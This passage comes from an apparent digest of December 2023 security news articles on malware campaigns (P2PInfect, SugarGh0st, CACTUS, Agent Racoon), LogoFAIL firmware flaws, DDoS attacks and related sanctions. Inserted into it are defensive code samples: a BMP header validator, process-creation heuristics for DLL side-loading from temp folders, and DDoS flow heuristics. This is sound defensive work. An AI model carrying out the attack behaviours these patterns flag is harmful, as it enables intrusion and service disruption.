One of the notable evasion methods is a check to determine whether the sample is being analyzed, terminating itself if so, along with an attempt to disable Linux core dumps, the files automatically generated by the kernel after a process crashes unexpectedly.

The MIPS variant also includes an embedded 64-bit Windows DLL module for Redis that allows for the execution of shell commands on a compromised system.

"Not only is this an interesting development in that it demonstrates a widening of scope for the developers behind P2PInfect (more supported processor architectures equals more nodes in the botnet itself), but the MIPS32 sample includes some notable defense evasion techniques," Cado said.

"This, combined with the malware's utilization of Rust (aiding cross-platform development) and rapid growth of the botnet itself, reinforces previous suggestions that this campaign is being conducted by a sophisticated threat actor."


LogoFAIL: UEFI Vulnerabilities Expose Devices to Stealth Malware Attacks
4.12.23  Attack  The Hacker News

The Unified Extensible Firmware Interface (UEFI) code from various independent firmware/BIOS vendors (IBVs) has been found vulnerable to potential attacks through high-impact flaws in image parsing libraries embedded into the firmware.

The shortcomings, collectively labeled LogoFAIL by Binarly, "can be used by threat actors to deliver a malicious payload and bypass Secure Boot, Intel Boot Guard, and other security technologies by design."

Furthermore, they can be weaponized to bypass security solutions and deliver persistent malware to compromised systems during the boot phase by injecting a malicious logo image file into the EFI system partition.

While the issues are not silicon-specific, meaning they impact both x86 and ARM-based devices, they are also UEFI and IBV-specific. The vulnerabilities comprise a heap-based buffer overflow flaw and an out-of-bounds read, details of which are expected to be made public later this week at the Black Hat Europe conference.

Specifically, these vulnerabilities are triggered when the injected images are parsed, leading to the execution of payloads that could hijack the flow and bypass security mechanisms.
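The root causes Binarly names, a heap-based buffer overflow and an out-of-bounds read in image parsers, come from trusting size fields inside an attacker-supplied image. As an added illustration, not Binarly's or any IBV's code, the Go function below validates a BMP header against the buffer that actually holds the file before any pixel data is read: it checks the magic, the DIB header size, the dimensions, the bits-per-pixel value, the pixel data offset, and that the number of pixel bytes the header demands fits inside the buffer. makeBMP constructs minimal in-memory test images, including one whose header claims far more rows than the file contains. BMP is used here because it is the format in the 2009 work the article cites; the same pre-read checks apply to any format a firmware parser accepts.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

const bmpHeaderLen = 14 + 40 // BITMAPFILEHEADER + BITMAPINFOHEADER

// BMPInfo holds the fields a parser may trust after validation.
type BMPInfo struct {
	Width, Height int
	BitsPerPixel  int
	PixelOffset   int
	PixelBytes    int // bytes of pixel data the header demands
}

// ValidateBMP checks every size field of a BMP header against the buffer
// that holds the image before any pixel is touched. These are the checks an
// image parser must make to avoid out-of-bounds reads and undersized heap
// buffers when the header fields are attacker-controlled.
func ValidateBMP(b []byte) (BMPInfo, error) {
	if len(b) < bmpHeaderLen {
		return BMPInfo{}, errors.New("buffer shorter than BMP headers")
	}
	if b[0] != 'B' || b[1] != 'M' {
		return BMPInfo{}, errors.New("bad magic")
	}
	pixelOffset := binary.LittleEndian.Uint32(b[10:14])
	dibSize := binary.LittleEndian.Uint32(b[14:18])
	width := int32(binary.LittleEndian.Uint32(b[18:22]))
	height := int32(binary.LittleEndian.Uint32(b[22:26]))
	bpp := binary.LittleEndian.Uint16(b[28:30])
	compression := binary.LittleEndian.Uint32(b[30:34])

	if dibSize < 40 || uint64(14)+uint64(dibSize) > uint64(len(b)) {
		return BMPInfo{}, errors.New("DIB header size out of range")
	}
	// Bounding the dimensions keeps the stride arithmetic below free of overflow.
	if width <= 0 || height == 0 || width > 1<<15 || height < -(1<<15) || height > 1<<15 {
		return BMPInfo{}, errors.New("unreasonable dimensions")
	}
	switch bpp {
	case 1, 4, 8, 16, 24, 32:
	default:
		return BMPInfo{}, errors.New("unsupported bits per pixel")
	}
	if compression != 0 {
		return BMPInfo{}, errors.New("only uncompressed (BI_RGB) images accepted")
	}
	rows := int64(height)
	if rows < 0 { // negative height means top-down rows; the row count is the magnitude
		rows = -rows
	}
	stride := ((int64(width)*int64(bpp) + 31) / 32) * 4 // rows are padded to 4 bytes
	need := stride * rows
	if uint64(pixelOffset) < uint64(14)+uint64(dibSize) || uint64(pixelOffset) > uint64(len(b)) {
		return BMPInfo{}, errors.New("pixel offset points outside the headers or the buffer")
	}
	if avail := int64(len(b)) - int64(pixelOffset); need > avail {
		return BMPInfo{}, fmt.Errorf("header demands %d pixel bytes but only %d are present", need, avail)
	}
	return BMPInfo{Width: int(width), Height: int(height), BitsPerPixel: int(bpp),
		PixelOffset: int(pixelOffset), PixelBytes: int(need)}, nil
}

// makeBMP builds a minimal uncompressed 24-bit BMP in memory (constructed
// test input); claimedHeight lets the caller forge the height field.
func makeBMP(width, height, claimedHeight int) []byte {
	stride := ((width*24 + 31) / 32) * 4
	b := make([]byte, bmpHeaderLen+stride*height)
	copy(b, "BM")
	binary.LittleEndian.PutUint32(b[2:], uint32(len(b)))
	binary.LittleEndian.PutUint32(b[10:], bmpHeaderLen)
	binary.LittleEndian.PutUint32(b[14:], 40)
	binary.LittleEndian.PutUint32(b[18:], uint32(width))
	binary.LittleEndian.PutUint32(b[22:], uint32(int32(claimedHeight)))
	binary.LittleEndian.PutUint16(b[26:], 1)
	binary.LittleEndian.PutUint16(b[28:], 24)
	return b
}

func main() {
	for name, img := range map[string][]byte{
		"honest 2x2":           makeBMP(2, 2, 2),
		"height forged to 4096": makeBMP(2, 2, 4096),
	} {
		info, err := ValidateBMP(img)
		fmt.Printf("%-22s -> info=%+v err=%v\n", name, info, err)
	}
}
```

The forged image is rejected because its header asks for 32,768 pixel bytes while the buffer holds 16; a parser that sized a heap buffer from the header, or read rows up to the claimed height, is exactly where an overflow or out-of-bounds read would occur.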

"This attack vector can give an attacker an advantage in bypassing most endpoint security solutions and delivering a stealth firmware bootkit that will persist in an ESP partition or firmware capsule with a modified logo image," the firmware security company said.

In doing so, threat actors could gain entrenched control over the impacted hosts, resulting in the deployment of persistent malware that can fly under the radar.

Unlike BlackLotus or BootHole, it's worth noting that LogoFAIL doesn't break runtime integrity by modifying the boot loader or firmware component.

The flaws affect all major IBVs like AMI, Insyde, and Phoenix as well as hundreds of consumer and enterprise-grade devices from vendors, including Intel, Acer, and Lenovo, making it both severe and widespread.

The disclosure marks the first public demonstration of attack surfaces related to graphic image parsers embedded into the UEFI system firmware since 2009, when researchers Rafal Wojtczuk and Alexander Tereshkin presented how a BMP image parser bug could be exploited for malware persistence.

"The types – and sheer volume – of security vulnerabilities discovered [...] show pure product security maturity and code quality in general on IBVs reference code," Binarly noted.


Microsoft Warns of Malvertising Scheme Spreading CACTUS Ransomware
4.12.23  Ransom  The Hacker News


Microsoft has warned of a new wave of CACTUS ransomware attacks that leverage malvertising lures to deploy DanaBot as an initial access vector.

The DanaBot infections led to "hands-on-keyboard activity by ransomware operator Storm-0216 (Twisted Spider, UNC2198), culminating in the deployment of CACTUS ransomware," the Microsoft Threat Intelligence team said in a series of posts on X (formerly Twitter).

DanaBot, tracked by the tech giant as Storm-1044, is a multi-functional tool along the lines of Emotet, TrickBot, QakBot, and IcedID that's capable of acting as a stealer and a point of entry for next-stage payloads.

UNC2198, for its part, has been previously observed infecting endpoints with IcedID to deploy ransomware families such as Maze and Egregor, as detailed by Google-owned Mandiant in February 2021.

Per Microsoft, the threat actor has also taken advantage of initial access provided by QakBot infections. The change to DanaBot is likely the result of a coordinated law enforcement operation in August 2023 that took down QakBot's infrastructure.

"The current Danabot campaign, first observed in November, appears to be using a private version of the info-stealing malware instead of the malware-as-a-service offering," Redmond further noted.

The credentials harvested by the malware are transmitted to an actor-controlled server, which is followed by lateral movement via RDP sign-in attempts and ultimately handing off access to Storm-0216.

The disclosure comes days after Arctic Wolf revealed another set of CACTUS ransomware attacks that are actively exploiting critical vulnerabilities in a data analytics platform called Qlik Sense to gain access to corporate networks.

It also follows the discovery of a new macOS ransomware strain dubbed Turtle that's written in the Go programming language and is signed with an ad-hoc signature, thereby preventing it from being executed upon launch due to Gatekeeper protections.


Agent Racoon Backdoor Targets Organizations in Middle East, Africa, and U.S.
2.12.23  Virus  The Hacker News

Organizations in the Middle East, Africa, and the U.S. have been targeted by an unknown threat actor to distribute a new backdoor called Agent Racoon.

"This malware family is written using the .NET framework and leverages the domain name service (DNS) protocol to create a covert channel and provide different backdoor functionalities," Palo Alto Networks Unit 42 researcher Chema Garcia said in a Friday analysis.

Targets of the attacks span various sectors such as education, real estate, retail, non-profits, telecom, and governments. The activity has not been attributed to a known threat actor, although it's assessed to be nation-state aligned owing to the victimology pattern and the detection and defense evasion techniques used.

The cybersecurity firm is tracking the cluster under the moniker CL-STA-0002. It's currently not clear how these organizations were breached, and when the attacks took place.

Some of the other tools deployed by the adversary include a customized version of Mimikatz called Mimilite as well as a new utility called Ntospy, which utilizes a custom DLL module implementing a network provider to steal credentials to a remote server.

"While the attackers commonly used Ntospy across the affected organizations, the Mimilite tool and the Agent Racoon malware have only been found in nonprofit and government-related organizations' environments," Garcia explained.


It's worth pointing out a previously identified threat activity cluster known as CL-STA-0043 has also been linked to the use of Ntospy, with the adversary also targeting two organizations that have been targeted by CL-STA-0002.

Agent Racoon, executed by means of scheduled tasks, allows for command execution, file uploading, and file downloading, while disguising itself as Google Update and Microsoft OneDrive Updater binaries.

The command-and-control (C2) infrastructure used in connection with the implant dates back to at least August 2020. An examination of VirusTotal submissions of the Agent Racoon artifacts shows that the earliest sample was uploaded in July 2022.

Unit 42 said it also uncovered evidence of successful data exfiltration from Microsoft Exchange Server environments, resulting in the theft of emails matching different search criteria. The threat actor has also been found to harvest victims' Roaming Profile.

"This tool set is not yet associated with a specific threat actor, and not entirely limited to a single cluster or campaign," Garcia said.


Russian Hacker Vladimir Dunaev Convicted for Creating TrickBot Malware
2.12.23  Virus  The Hacker News

A Russian national has been found guilty in connection with his role in developing and deploying a malware known as TrickBot, the U.S. Department of Justice (DoJ) announced.

Vladimir Dunaev, 40, was arrested in South Korea in September 2021 and extradited to the U.S. a month later.

"Dunaev developed browser modifications and malicious tools that aided in credential harvesting and data mining from infected computers, facilitated and enhanced the remote access used by TrickBot actors, and created a program code to prevent the TrickBot malware from being detected by legitimate security software," the DoJ said.

"During Dunaev's participation in the scheme, 10 victims in the Northern District of Ohio, including Avon schools and a North Canton real-estate company, were defrauded of more than $3.4 million via ransomware deployed by TrickBot."

Dunaev, who pleaded guilty to committing computer fraud and identity theft and conspiracy to commit wire fraud and bank fraud, faces a maximum of 35 years in prison. He is scheduled to be sentenced on March 20, 2024.

Dunaev is also the second TrickBot gang malware developer to be arrested, after Alla Witte, a Latvian national who was sentenced to two years and eight months in prison in June 2023.

The development came nearly three months after the U.K. and U.S. governments sanctioned 11 individuals suspected of being part of the TrickBot cybercrime group.

TrickBot, which started off as a banking trojan in 2016, evolved into a multi-purpose tool capable of delivering additional payloads to infected hosts and acting as an initial access facilitator for ransomware attacks.

After surviving a law enforcement effort to dismantle the botnet, the infamous Conti ransomware crew gained control over the operation. However, both Conti and TrickBot suffered a major blow last year following Russia's invasion of Ukraine, when Conti pledged allegiance to Russia.

This led to a series of leaks dubbed ContiLeaks and TrickLeaks that gave away valuable information about their internal chats and infrastructure, ultimately resulting in the shutdown of Conti and its disintegration into numerous other groups.

New FjordPhantom Android Malware Targets Banking Apps in Southeast Asia
1.12.23  OS  The Hacker News

Cybersecurity researchers have disclosed a new sophisticated Android malware called FjordPhantom that has been observed targeting users in Southeast Asian countries like Indonesia, Thailand, and Vietnam since early September 2023.

"Spreading primarily through messaging services, it combines app-based malware with social engineering to defraud banking customers," Oslo-based mobile app security firm Promon said in an analysis published Thursday.

Propagated mainly via email, SMS, and messaging apps, attack chains trick recipients into downloading a purported banking app that comes fitted with legitimate features but also incorporates rogue components.

Victims are then subjected to a social engineering technique akin to telephone-oriented attack delivery (TOAD), which involves calling a bogus call center to receive step-by-step instructions for running the app.

A key characteristic of the malware that sets it apart from other banking trojans of its kind is the use of virtualization to run malicious code in a container and fly under the radar.

The sneaky method, Promon said, breaks Android's sandbox protections as it allows different apps to be run in the same sandbox, enabling the malware to access sensitive data without requiring root access.

"Virtualization solutions like the one used by the malware can also be used to inject code into an application because the virtualization solution first loads its own code (and everything else found in its app) into a new process and then loads the code of the hosted application," security researcher Benjamin Adolphi said.

In the case of FjordPhantom, the host app downloaded includes a malicious module and the virtualization element that's then used to install and launch the embedded app of the targeted bank in a virtual container.

In other words, the bogus app is engineered to load the bank's legitimate app in a virtual container while also employing a hooking framework within the environment to alter the behavior of key APIs, grab sensitive information from the application's screen programmatically, and close dialog boxes used to warn of malicious activity on users' devices.

"FjordPhantom itself is written in a modular way to attack different banking apps," Adolphi said. "Depending on which banking app is embedded into the malware, it will perform various attacks on these apps."


Qakbot Takedown Aftermath: Mitigations and Protecting Against Future Threats
1.12.23  Virus  The Hacker News

The U.S. Department of Justice (DOJ) and the FBI recently collaborated in a multinational operation to dismantle the notorious Qakbot malware and botnet. While the operation was successful in disrupting this long-running threat, concerns have arisen as it appears that Qakbot may still pose a danger in a reduced form. This article discusses the aftermath of the takedown, provides mitigation strategies, and offers guidance on determining past infections.

The Takedown and Its Limitations#
During the takedown operation, law enforcement secured court orders to remove Qakbot malware from infected devices remotely. It was discovered that the malware had infected a substantial number of devices, with 700,000 machines globally, including 200,000 computers in the U.S., being compromised at the time of the takedown. However, recent reports suggest that Qakbot is still active but in a diminished state.

The absence of arrests during the takedown operation indicates that only the command-and-control (C2) servers were affected, leaving the spam delivery infrastructure untouched. Therefore, the threat actors behind Qakbot continue to operate, presenting an ongoing threat.

Mitigations for Future Protection#
To safeguard against potential Qakbot resurgence or similar threats, the FBI and the Cybersecurity & Infrastructure Security Agency (CISA) recommend several key mitigations:

Require Multi-Factor Authentication (MFA): Implement MFA for remote access to internal networks, particularly in critical infrastructure sectors like healthcare. MFA is highly effective in preventing automated cyberattacks.
Regularly Conduct Employee Security Training: Educate employees about security best practices, including avoiding clicking on suspicious links. Encourage practices like verifying the source of links and typing website names directly into browsers.
Update Corporate Software: Keep operating systems, applications, and firmware up to date. Use centralized patch management systems to ensure timely updates and assess the risk for each network asset.
Eliminate Weak Passwords: Comply with NIST guidelines for employee password policies and prioritize MFA over password reliance wherever possible.
Filter Network Traffic: Block incoming and outgoing communications with known malicious IP addresses by implementing block/allow lists.
Develop a Recovery Plan: Prepare and maintain a recovery plan to guide security teams in the event of a breach.
Follow the "3-2-1" Backup Rule: Maintain at least three copies of critical data, with two stored in separate locations and one stored off-site.
Checking for Past Infections#
For individuals concerned about past Qakbot infections, there is some good news. The DOJ has recovered over 6.5 million stolen passwords and credentials from Qakbot's operators. To check if your login information has been exposed, you can use the following resources:

Have I Been Pwned: This widely known site allows you to check if your email address has been compromised in data breaches. It now includes the Qakbot dataset in its database.
Check Your Hack: Created by the Dutch National Police using Qakbot's seized data, this site lets you enter your email address and provides an automatic email notification if your address is found in the dataset.
World's Worst Passwords List: Since Qakbot utilizes a list of common passwords for brute-force attacks, you can check this list to ensure your password is not among the worst.
Conclusion#
While the takedown of Qakbot was a significant achievement, the threat landscape remains complex. There is a possibility of Qakbot's resurgence, given its operators' adaptability and resources. Staying vigilant and implementing security measures is crucial to prevent future infections. BlackBerry's CylanceENDPOINT solution is recommended to protect against Qakbot's execution, and specific rules within CylanceOPTICS can enhance protection against threats like Qakbot.


Chinese Hackers Using SugarGh0st RAT to Target South Korea and Uzbekistan
1.12.23  Virus  The Hacker News

A suspected Chinese-speaking threat actor has been attributed to a malicious campaign that targets the Uzbekistan Ministry of Foreign Affairs and South Korean users with a remote access trojan called SugarGh0st RAT.

The activity, which commenced no later than August 2023, leverages two different infection sequences to deliver the malware, which is a customized variant of Gh0st RAT (aka Farfli).

It comes with features to "facilitate the remote administration tasks as directed by the C2 and modified communication protocol based on the similarity of the command structure and the strings used in the code," Cisco Talos researchers Ashley Shen and Chetan Raghuprasad said.

The attacks commence with a phishing email bearing decoy documents; opening them activates a multi-stage process that leads to the deployment of SugarGh0st RAT.

The decoy documents are incorporated within a heavily obfuscated JavaScript dropper that's contained within a Windows Shortcut file embedded in the RAR archive email attachment.

"The JavaScript decodes and drops the embedded files into the %TEMP% folder, including a batch script, a customized DLL loader, an encrypted SugarGh0st payload, and a decoy document," the researchers said.

The decoy document is then displayed to the victim, while, in the background, the batch script runs the DLL loader, which is in turn side-loaded by a copied version of the legitimate Windows executable rundll32.exe to decrypt and launch the SugarGh0st payload.

A second variant of the attack also begins with a RAR archive containing a malicious Windows Shortcut file that masquerades as a lure, with the difference being that the JavaScript leverages DynamicWrapperX to run shellcode that launches SugarGh0st.
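The delivery chain above (files dropped into %TEMP%, a batch script, and a copied rundll32.exe side-loading a DLL from there) suggests a few process-creation heuristics a defender can run over endpoint telemetry. The following is an added example written for this article, not detection content from Cisco Talos; the file names, user name and the assumption that the batch script is spawned by a script host are constructed for illustration.

```python
"""Process-creation heuristics for the SugarGh0st delivery chain described above,
run over constructed Sysmon-style records. Not Talos detection content."""
import ntpath
import re
from dataclasses import dataclass

TEMP_DIR = re.compile(r"\\(?:temp|tmp)\\", re.IGNORECASE)
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")


@dataclass(frozen=True)
class ProcEvent:
    image: str          # full path of the new process
    cmdline: str        # its command line
    parent_image: str   # full path of the parent process


def suspicious_reasons(ev):
    """Return the heuristics an event trips; an empty list means nothing matched."""
    image = ev.image.lower()
    cmd = ev.cmdline.lower()
    name = ntpath.basename(image)
    parent = ntpath.basename(ev.parent_image.lower())
    reasons = []
    # a copy of rundll32.exe running from anywhere but the system directories
    # (a renamed copy would need the PE OriginalFileName field to catch)
    if name == "rundll32.exe" and not image.startswith(SYSTEM_DIRS):
        reasons.append("rundll32 copy outside system dirs")
    # rundll32 (genuine or copied) asked to load a DLL that sits in a temp folder
    if name == "rundll32.exe" and TEMP_DIR.search(cmd) and ".dll" in cmd:
        reasons.append("rundll32 loading dll from temp")
    # batch script in a temp folder started by a script host (assumed: the JS dropper)
    if name == "cmd.exe" and parent in SCRIPT_HOSTS and TEMP_DIR.search(cmd) and ".bat" in cmd:
        reasons.append("temp batch script spawned by script host")
    return reasons


def scan(events):
    """Map each flagged image path to the reasons it was flagged."""
    result = {}
    for ev in events:
        reasons = suspicious_reasons(ev)
        if reasons:
            result[ev.image] = reasons
    return result


# Constructed sample events (paths and file names are placeholders, not IoCs)
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c C:\Users\alice\AppData\Local\Temp\run.bat",
              r"C:\Windows\System32\wscript.exe"),
    ProcEvent(r"C:\Users\alice\AppData\Local\Temp\rundll32.exe",
              r"rundll32.exe C:\Users\alice\AppData\Local\Temp\loader.dll,Start",
              r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for path, why in scan(SAMPLE_EVENTS).items():
        print(path, "->", "; ".join(why))
```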

SugarGh0st, a 32-bit dynamic-link library (DLL) written in C++, establishes contact with a hard-coded command-and-control (C2) domain, allowing it to transmit system metadata to the server, launch a reverse shell, and run arbitrary commands.

It can also enumerate and terminate processes, take screenshots, perform file operations, and even clear the machine's event logs in an attempt to cover its tracks and evade detection.

The campaign's links to China stem from Gh0st RAT's Chinese origins and the fact that the fully functional backdoor has been widely adopted by Chinese threat actors over the years, in part driven by the release of its source code in 2008. Another piece of smoking-gun evidence is the use of Chinese names in the "last modified by" field in the metadata of the decoy files.

"The Gh0st RAT malware is a mainstay in the Chinese threat actors' arsenal and has been active since at least 2008," the researchers said.

"Chinese actors also have a history of targeting Uzbekistan. The targeting of the Uzbekistan Ministry of Foreign Affairs also aligns with the scope of Chinese intelligence activity abroad."

The development comes as Chinese state-sponsored groups have also increasingly targeted Taiwan in the last six months, with the attackers repurposing residential routers to mask their intrusions, according to Google.


Discover How Gcore Thwarted Powerful 1.1Tbps and 1.6Tbps DDoS Attacks
1.12.23  Attack  The Hacker News

The most recent Gcore Radar report and its aftermath have highlighted a dramatic increase in DDoS attacks across multiple industries. At the beginning of 2023, the average strength of attacks reached 800 Gbps, but now, even a peak as high as 1.5+ Tbps is unsurprising. To try and break through Gcore's defenses, perpetrators made two attempts with two different strategies. Read on to discover what happened and learn how the security provider stopped the attackers in their tracks without affecting end users' experiences.

Powerful DDoS Attacks#
In November 2023, one of Gcore's customers from the gaming industry was targeted by two massive DDoS attacks, peaking at 1.1 and 1.6 Tbps respectively. The attackers deployed various techniques in an unsuccessful attempt to compromise Gcore's protective mechanisms.

Attack #1: 1.1 Tbps UDP-based DDoS#
In the first cyber assault, the attackers sent a barrage of UDP traffic to a target server, peaking at 1.1 Tbps. Two methods were employed:

By using random UDP source ports, they hoped to evade conventional filtering mechanisms.
The attackers concealed their genuine identity by forging source IP addresses.
This was a classic flood (or volumetric) attack, whereby the attackers hoped to consume all available bandwidth within or to a data center or network, overwhelming the target servers with traffic and making them unavailable to legitimate users.

The graph below shows the customer's traffic during the attack. The peak of 1.1 Tbps shows an aggressive but short-lived attempt to flood the network with data. The green line ("total.general.input") shows all inbound traffic. The other colored lines on the graph represent the network's responses, including measures to filter and drop malicious traffic, as the system manages the deluge of data.

[Graph: the Gcore customer's network traffic during the attack, with a short but intense peak of 1.1 Tbps around 22:55]
Attack #2: 1.6 Tbps TCP-based DDoS#

[Graph: the nine-hour attack, with a consistent traffic volume of 700 Mbps and a peak of 1600 Mbps at the onset]


This time, the attackers attempted to exploit the TCP protocol with a mix of SYN flood, PSH, and ACK traffic.

In a SYN flood attack, a large number of SYN packets are delivered to the target server without the handshake ever being completed with an ACK. This means the server holds a half-open connection for each SYN packet. If successful, the server will ultimately run out of resources and stop accepting connections.

The PSH, ACK phase of the attack rapidly sends data to the target system. The ACK flag signals that the server received the previous packet. This pushes the system to handle data promptly, wasting resources. A flood using PSH, ACK packets is harder to defend against than a plain SYN flood, since the PSH flag causes the server to process the packet contents immediately, consuming more resources.

As before, the goal was to overload the customer's servers and make their services inaccessible to authorized users. This SYN flood had a peak volume of 685.77 Mbps and the PSH, ACK had a magnitude of 906.73 Mbps.
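The three traffic patterns described above (UDP with randomised source ports, SYN packets that never complete a handshake, and PSH/ACK segments with no prior handshake) can each be spotted from inbound packet headers alone. The following added example, not Gcore's code, shows flow-level heuristics over constructed packet records; the thresholds, the destination address and the attacking ranges are all assumptions chosen for illustration.

```python
"""Flow-level heuristics for the three DDoS patterns discussed above, run over
constructed packet headers inbound to one destination. Added example, not Gcore code."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Pkt:
    proto: str          # "tcp" or "udp"
    src: str            # source IP (may be spoofed; that cannot be told offline)
    sport: int          # source port
    dst: str            # destination IP under attack
    flags: str = ""     # TCP flags sent by the client: "S" SYN, "A" ACK, "PA" PSH+ACK


def analyse(pkts, half_open_ratio=5.0, orphan_share=0.5, port_spread=64):
    """Aggregate per destination and flag the three patterns (thresholds are assumed).

    half_open_ratio: SYNs never followed by a client ACK vs completed handshakes
    orphan_share:    fraction of PSH/ACK segments whose (src, sport) never sent a SYN
    port_spread:     distinct UDP source ports seen from a single source IP
    """
    syn_seen = defaultdict(set)        # dst -> {(src, sport)} that sent a SYN
    completed = defaultdict(set)       # dst -> {(src, sport)} that ACKed after the SYN
    pa_total = defaultdict(int)        # dst -> PSH/ACK count
    pa_orphan = defaultdict(int)       # dst -> PSH/ACK count with no preceding SYN
    udp_ports = defaultdict(lambda: defaultdict(set))  # dst -> src -> {sport}

    for p in pkts:
        key = (p.src, p.sport)
        if p.proto == "udp":
            udp_ports[p.dst][p.src].add(p.sport)
        elif p.flags == "S":
            syn_seen[p.dst].add(key)
        elif p.flags == "A":
            if key in syn_seen[p.dst]:          # third step of the handshake
                completed[p.dst].add(key)
        elif p.flags == "PA":
            pa_total[p.dst] += 1
            if key not in syn_seen[p.dst]:      # data with no handshake at all
                pa_orphan[p.dst] += 1

    findings = {}
    for dst in set(syn_seen) | set(pa_total) | set(udp_ports):
        hits = []
        half_open = len(syn_seen[dst] - completed[dst])
        done = len(completed[dst])
        if half_open / max(done, 1) > half_open_ratio:
            hits.append(f"syn_flood: {half_open} half-open vs {done} completed")
        if pa_total[dst] and pa_orphan[dst] / pa_total[dst] > orphan_share:
            hits.append(f"psh_ack_flood: {pa_orphan[dst]}/{pa_total[dst]} orphan PSH/ACK")
        for src, ports in udp_ports[dst].items():
            if len(ports) >= port_spread:
                hits.append(f"udp_flood: {src} used {len(ports)} source ports")
        if hits:
            findings[dst] = hits
    return findings


DST = "192.0.2.10"   # constructed target address (documentation range)


def sample_traffic():
    """Constructed sample: 20 legitimate clients followed by the three attack patterns."""
    pkts = []
    for i in range(20):                       # normal clients: SYN, ACK, then data
        src, sport = f"10.0.0.{i}", 40000 + i
        pkts += [Pkt("tcp", src, sport, DST, "S"),
                 Pkt("tcp", src, sport, DST, "A"),
                 Pkt("tcp", src, sport, DST, "PA")]
    for i in range(500):                      # SYN flood: 500 connections never completed
        pkts.append(Pkt("tcp", f"198.51.100.{i % 250}", 1024 + i, DST, "S"))
    for i in range(300):                      # PSH/ACK flood with no handshake
        pkts.append(Pkt("tcp", f"203.0.113.{i % 200}", 2048 + i, DST, "PA"))
    for i in range(400):                      # UDP flood, 400 distinct source ports
        pkts.append(Pkt("udp", "203.0.113.250", 10000 + (i * 37) % 50000, DST))
    return pkts


if __name__ == "__main__":
    for dst, hits in analyse(sample_traffic()).items():
        print(dst, hits)
```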

Gcore's Defensive Strategies#
Gcore's DDoS Protection effectively neutralized both attacks while preserving regular service for the customer's end users. The general approach of fending off DDoS security threats includes several techniques, such as Gcore's front-line defenses:

Dynamic traffic shaping: Dynamically adjusted traffic rates effectively mitigate the impact of the attack while ensuring the continuity of critical services. In order to prioritize genuine traffic while slowing harmful transmissions, adaptive thresholds and rate restrictions are used.
Anomaly detection and quarantine: Models based on machine learning analyze behavior to identify anomalies. When an anomaly occurs, automated quarantine mechanisms redirect erroneous traffic to isolated segments for additional analysis.
Regular expression filters: To block malicious payloads without disrupting legitimate traffic, regular expression-based filter rules are implemented. Their continuous fine-tuning ensures optimal protection without false positives.
Collaborative threat intelligence: Gcore actively engages in the exchange of threat intelligence with industry peers. Collective insights and real-time threat feeds guide Gcore's security techniques, allowing a rapid response to developing attack vectors.
By employing these strategies, Gcore was able to effectively mitigate the impact of the DDoS attacks and protect its customer's platform from disruption, negating potential reputational and financial losses.

Conclusion#
DDoS attacks of 1.5+ Tbps volume pose an increasing danger across industries, with attackers using imaginative techniques to try to bypass protection services. Over the course of 2023, Gcore has registered increases in both average and maximum attack volumes, and these two connected attacks demonstrate that trend.

In the attacks covered in the article, Gcore was able to prevent any damage through a combination of dynamic traffic shaping, anomaly detection, regular expression filters, and collaborative threat intelligence. Explore DDoS Protection options to secure your network against ever-evolving DDoS threats.


WhatsApp's New Secret Code Feature Lets Users Protect Private Chats with Password
1.12.23  Social  The Hacker News

Meta-owned WhatsApp has launched a new Secret Code feature to help users protect sensitive conversations with a custom password on the messaging platform.

The feature has been described as an "additional way to protect those chats and make them harder to find if someone has access to your phone or you share a phone with someone else."

Secret Code builds on another feature called Chat Lock that WhatsApp announced in May, which moves chats to a separate folder of their own such that they can be accessed only upon providing their device password or biometrics.

By setting a unique password for these locked chats that is different from the password used to unlock the phone, the aim is to give users an additional layer of privacy, WhatsApp noted.

"You'll have the option to hide the Locked Chats folder from your chatlist so that they can only be discovered by typing your secret code in the search bar," it added.

The development comes weeks after WhatsApp introduced a "Protect IP Address in Calls" feature that masks users' IP addresses to other parties by relaying the calls through its servers.

It also follows calls by the French government urging ministers, secretaries of state, and cabinet members to refrain from using popular messaging apps like WhatsApp, Signal, and Telegram in favor of homegrown alternatives like Tchap (based on the Matrix protocol) and Olvid by December 8, 2023.

The news, which was first reported by Le Point, cited a circulated document that claimed: "these digital tools are not devoid of security vulnerabilities and therefore do not ensure the security of conversations and information shared through them."

In response, Meredith Whittaker, president of Signal, hit back at the French government's decision, stating, "this claim is not backed by any evidence, and is dangerously misleading esp. coming from gov." Will Cathcart, the head of WhatsApp, concurred, saying, "we are of the same opinion."


U.S. Treasury Sanctions North Korean Kimsuky Hackers and 8 Foreign-Based Agents
1.12.23  BigBrothers  The Hacker News

The U.S. Department of the Treasury's Office of Foreign Assets Control (OFAC) on Thursday sanctioned the North Korea-linked adversarial collective known as Kimsuky as well as eight foreign-based agents who are alleged to have facilitated sanctions evasion.

The agents, the Treasury said, helped in "revenue generation and missile-related technology procurement that support the DPRK's weapons of mass destruction (WMD) programs."

The sanctions against Kimsuky, which have been levied for gathering intelligence to support the regime's strategic objectives, come more than four years after the OFAC imposed similar measures against the Lazarus Group and its offshoots Andariel and BlueNoroff in September 2019.

The actions are in response to North Korea's launch of a military reconnaissance satellite late last month, the Treasury added. They also arrive a day after a virtual currency mixer service called Sinbad was sanctioned for processing stolen assets linked to hacks perpetrated by the Lazarus Group.

Kimsuky – also called APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), Nickel Kimball, and Velvet Chollima – is a prolific cyber espionage crew that primarily targets governments, nuclear organizations, and foreign relations entities to collect intelligence that helps further North Korea's interests.

"The group combines moderately sophisticated technical capabilities with aggressive social engineering tactics, especially against South Korean and U.S.-based government organizations, academics, and think tanks focused on Korean peninsula geopolitical issues," Google-owned Mandiant noted in October 2023.

Like the Lazarus Group, it's also an element within the Reconnaissance General Bureau (RGB), which is North Korea's primary foreign intelligence service responsible for intelligence collection operations. It has been active since at least 2012.

"Kimsuky employs social engineering to collect intelligence on geopolitical events, foreign policy strategies, and diplomatic efforts affecting its interests by gaining illicit access to the private documents, research, and communications of their targets," the Treasury said.

